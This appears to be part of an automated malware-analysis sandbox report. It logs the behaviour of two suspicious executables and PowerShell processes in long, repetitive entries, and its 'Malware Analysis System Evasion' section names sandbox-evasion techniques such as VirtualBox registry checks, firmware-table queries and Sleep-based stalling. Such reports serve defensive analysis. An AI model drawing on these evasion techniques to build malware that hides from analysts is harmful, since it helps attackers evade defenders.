Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\ProgramData\Program\iusb3mon.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_32-35332

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Program\iusb3mon.exe

Stalling execution: Execution stalls by calling Sleep

graph_32-35445

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	System information queried: FirmwareTableInformation
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: OutputDebugStringW count: 273
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Section loaded: OutputDebugStringW count: 1890

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\Program\iusb3mon.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4492	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2328	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4196	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1723	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1400	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5279	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3899	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1993	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 578
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Window / User API: threadDelayed 1626
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Window / User API: threadDelayed 574
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1183
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1184
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1212
Source: C:\ProgramData\Program\iusb3mon.exe	Window / User API: threadDelayed 2095
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4728
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1527
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2646
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2923
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 694
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4797
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4139
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3297
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3696
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 974
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3386
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 962
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 922
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 910
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 753
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 799
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 853
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 463
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 780
